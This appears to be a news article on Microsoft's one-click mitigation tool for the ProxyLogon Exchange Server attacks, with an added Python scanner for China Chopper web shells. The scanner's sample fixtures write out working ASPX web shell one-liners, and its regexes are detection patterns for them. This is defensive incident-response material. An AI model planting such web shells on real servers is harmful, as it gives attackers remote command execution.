On Monday, Microsoft announced the rollout of a new one-click mitigation tool intended to shield still-vulnerable environments from the ongoing ProxyLogon attacks against Exchange Server. The tool, the Exchange On-premises Mitigation Tool (EOMT), is a PowerShell script that applies a mitigation for CVE-2021-26855, the server-side request forgery flaw that serves as the entry point of the ProxyLogon chain, and then runs the Microsoft Safety Scanner to detect web shells already deployed on the server and remove any compromise it identifies.

According to Microsoft, the tool is aimed primarily at customers who are unfamiliar with the patch and update process or who have not yet applied the critical security updates to their on-premises Exchange systems. The rollout coincides with a surge in attacks by more than ten sophisticated threat groups, most of them believed to be state-sponsored, exploiting unpatched Exchange Servers worldwide. These actors have deployed backdoors, coin miners, and ransomware, and the problem has been compounded by the public availability of proof-of-concept exploits.

Recent data from RiskIQ indicates that, as of March 12, 317,269 of roughly 400,000 on-premises Exchange Servers exposed to the internet had been patched, leaving the largest concentrations of unpatched servers in the United States, Germany, the United Kingdom, France, and Italy. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also expanded its guidance to cover the multiple variants of the China Chopper web shell that attackers have been dropping on compromised servers in these campaigns.
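The Safety Scanner pass in EOMT and the CISA web shell guidance both come down to one check an incident responder will want to be able to run by hand: sweep the directories IIS serves for script files that evaluate attacker-supplied request data. The scanner below is an added example written for this article; it is not code from the article, from Microsoft's tool, or from CISA. The indicator regexes, the set of executable extensions, and the directory layout of the constructed sample tree are all assumptions of the example, modelled on the published China Chopper ASPX one-liner form `eval(Request.Item["..."],"unsafe")` and its `Page_Load` variant; a real sweep should be driven by the vendor's published indicators as well.

```python
"""Sweep a web root for China Chopper-style ASPX web shells.

Added illustration for this article, not Microsoft's EOMT or Safety Scanner.
The regexes, extension list and sample directory names are assumptions.
"""
import os
import re
import tempfile
from typing import Dict, List, Optional, Tuple

# Indicator regexes (assumed for this example). The first matches the public
# China Chopper ASPX one-liner eval(Request.Item["..."],"unsafe") and its
# Page_Load variant; the second is a looser catch-all for any server-side
# eval whose argument is read straight from the request.
INDICATORS: List[Tuple[str, re.Pattern]] = [
    ("china_chopper_eval_unsafe",
     re.compile(r'eval\s*\(\s*Request(?:\.Item)?\s*\[\s*["\'][^"\']+["\']\s*\]'
                r'\s*,\s*["\']unsafe["\']', re.IGNORECASE)),
    ("eval_of_request_input",
     re.compile(r'\beval\s*\(\s*Request\b', re.IGNORECASE)),
]

# Extensions IIS executes server-side; anything else is skipped as inert.
EXECUTABLE_EXTS = {".aspx", ".ashx", ".asmx", ".asax", ".ascx", ".asp"}


def classify(content: str) -> Optional[str]:
    """Return the name of the first indicator that matches, or None."""
    for name, pattern in INDICATORS:
        if pattern.search(content):
            return name
    return None


def scan_tree(root: str) -> List[Tuple[str, str]]:
    """Walk root and return (path, indicator) for each suspicious script file."""
    hits: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in sorted(files):
            if os.path.splitext(fname)[1].lower() not in EXECUTABLE_EXTS:
                continue
            path = os.path.join(dirpath, fname)
            try:
                # errors="replace" keeps binary junk from aborting the sweep
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    verdict = classify(fh.read())
            except OSError:
                continue
            if verdict:
                hits.append((path, verdict))
    return hits


# Constructed sample files for an offline run (not artefacts from a real
# server). Directory names are an assumption of this example.
SAMPLE_FILES = {
    "owa/auth/logon.aspx": (            # benign: reads the request, no eval
        '<%@ Page Language="C#" %>\n'
        '<script runat="server">\n'
        '  void Page_Load() { string u = Request.Form["username"]; }\n'
        '</script>\n<html><body>Sign in</body></html>\n'),
    "owa/auth/help.aspx": (             # classic one-liner shell
        '<%@ Page Language="Jscript"%>'
        '<%eval(Request.Item["pass"],"unsafe");%>\n'),
    "ecp/auth/supp0rt.aspx": (          # Page_Load variant of the same shell
        '<script language="JScript" runat="server">\n'
        'function Page_Load(){eval(Request["orange"],"unsafe");}\n'
        '</script>\n'),
    "aspnet_client/system_web/error.aspx": (   # eval without the "unsafe" flag
        '<%@ Page Language="Jscript"%><%eval(Request.Form["c"]);%>\n'),
    "aspnet_client/readme.txt": (       # same text, but IIS will not execute it
        'eval(Request["x"],"unsafe") -- plain text, not a script\n'),
}


def build_sample_tree(root: str) -> None:
    """Write the constructed sample files under root."""
    for rel, body in SAMPLE_FILES.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


def demo() -> Dict[str, str]:
    """Build the sample tree in a temp dir, scan it, return {rel path: indicator}."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return {os.path.relpath(p, root).replace(os.sep, "/"): v
                for p, v in scan_tree(root)}


if __name__ == "__main__":
    for rel, verdict in sorted(demo().items()):
        print(f"{verdict:28s} {rel}")
```

Run it against a real Exchange install by calling `scan_tree()` on the front-end and client-access web roots; the demo flags the three shells and ignores both the legitimate logon page and the `.txt` decoy. Note what the looser second regex trades: it catches shells that drop the `"unsafe"` flag but will also fire on any hand-written page that evals request input, so treat its hits as leads to inspect rather than verdicts.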

The rapid escalation of the attacks has prompted Microsoft to investigate how the campaign moved from the limited, targeted intrusions seen in early January to broad, indiscriminate exploitation. One line of inquiry is whether vulnerability information was improperly leaked by one of Microsoft's security partners, widening the pool of attackers before the patches shipped.

In parallel, there is speculation that some of the tooling used in the campaign's second wave closely resembles proof-of-concept code Microsoft shared with antivirus partners on February 23. That resemblance raises the question of an insider leak, but it does not settle it: the threat actors may have discovered the same vulnerabilities independently, used them for quiet reconnaissance, and then ramped up exploitation once they sensed that Microsoft's patch was imminent.

Microsoft noted that this is the second significant nation-state incident in just four months, and that the same vulnerabilities are now being picked up by criminal groups for new ransomware operations and other malicious activity. The tactics observed map onto familiar MITRE ATT&CK techniques: initial access by exploiting a public-facing application (T1190), persistence through web shells and other backdoors (T1505.003), and privilege escalation to push deeper into the compromised network.

Organizations running on-premises Exchange should apply the security updates as soon as possible; the mitigation tool is an interim measure for servers that cannot be patched immediately, not a replacement for the update, and it does not undo a compromise that has already happened. As operational environments grow more complex, that discipline around patching and post-incident checking is what keeps these risks manageable.
